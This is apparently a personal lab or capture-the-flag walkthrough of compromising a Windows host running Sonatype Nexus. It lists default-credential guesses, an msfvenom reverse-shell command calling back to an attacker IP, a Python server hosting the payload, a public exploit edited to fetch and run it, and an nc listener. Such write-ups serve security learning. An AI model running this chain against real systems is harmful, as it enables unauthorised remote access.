**Simple nmap scan**

`nmap -sC -sV -Pn -T4 -oN nmapscan1.txt 192.168.152.61`

`nmap -Pn -T5 -p- -oN portscan.txt 192.168.152.61`

![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/8fdef0be-295b-4c2b-8630-afb8b06c54fc/Untitled.png)

![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/367a6262-7dc7-4b26-977b-0a4927b2a3f2/Untitled.png)

**FTP did not have anom login. SMB shares did not have anom read access. RCP did not have open session of anom login. SO we decide to look at the wesbites**

The first page is some “BaGet” page

![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/994a559c-cf75-464f-b235-d6d20a9b203f/Untitled.png)

looking up vulnerabilities we do not find much. Checked for SQL injections and possbile data leaks but do not find much so we decided to **take a peek at the website on port 8001**

**we find a nexus dashboard, TIME TO INSPECT HE NESSUS DASHBOARD:**

![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/9723c1d9-4029-454f-b3fd-3fc5a553a582/Untitled.png)

and we find a version

![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/01e1a9e8-f72e-452e-9477-6d62cc0286fe/Untitled.png)

Next, I seachsploited “Sonatype Nexus”

![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/42cd1ad3-2693-4be0-8ad7-6b0b71ff7fbd/Untitled.png)

we find a single vuln so we google this vuln to check it out

![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/814d2abc-1470-4baf-99ec-41c739bdbc07/Untitled.png)

![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/ffb5ec9c-2db4-49fc-9bbb-c1b97ee0f1d7/Untitled.png)

Looks like money!


**Expecting how the exploit works**

![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/21b4048c-6483-465b-83aa-4b2b198e5efd/Untitled.png)

Looks like there are four fields to edit. ONE BEING CREDIENTALS we do not have yet.

Therefore we have to exploit another service/brute force and find some creds.

**FIRST I DECIDE TO TRY SOME BASIC CREDS BEFORE EXPLOITATION OF A SERVICE AND OR BRUTE FORCE**

![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/ea462b8a-7100-468d-8801-211a6ea10f57/Untitled.png)

we try:

admin admin

admin password

admins P@ssw0rd

administrator administrator

administrator password

nexus password

**nexus nexus**

**BOOM NEXUS NEXUS WORKS**

![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/56c3e78d-66c3-420a-ad11-f8eac776f665/Untitled.png)

**WAY TO TEST IF EXPLOIT WORKS**

start wireshark

then try pinging our host device

filer for ICMP packets

![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/50f7198d-f1e2-4ef2-9fa7-a8e630d1eff5/Untitled.png)

**Now lets attempt to edit exploit to upload reverse shell to target machine**

make reverse shell:

`sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.5 LPORT=5555 -f exe -o shell.exe`

![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/0622b7e9-9e74-469c-a377-385e13fc814e/Untitled.png)

start python server

`python3 -m http.server 80`

edit exploit to download our reverse shell:

![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/21b74296-a216-4f99-bcd1-31c741bcac60/Untitled.png)

now run out exploit:

`python3 [49385.py](http://49385.py/)`

![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/286c7eed-af77-449e-938e-397abcaaa672/Untitled.png)

![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/27f77c4a-eec6-40ea-94f1-6efe24968f60/Untitled.png)

Sucess

**Next, attempt to run reverse shell on target device**

start listner:

`sudo nc -lvnp 5555`

![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/c3442041-ab5c-45be-b57e-0038ab82e8db/Untitled.png)

Edit exploit to run our reverse shell:

![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/dfa68316-bd6d-4cd8-a53a-e4f61494a8ea/Untitled.png)

Now we run the exploit again:

`python3 [49385.py](http://49385.py/)`

and…

![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/9249f3b6-f55c-4129-af3c-07681c4c685d/Untitled.png)

Scuess

Next lets look for priv esc


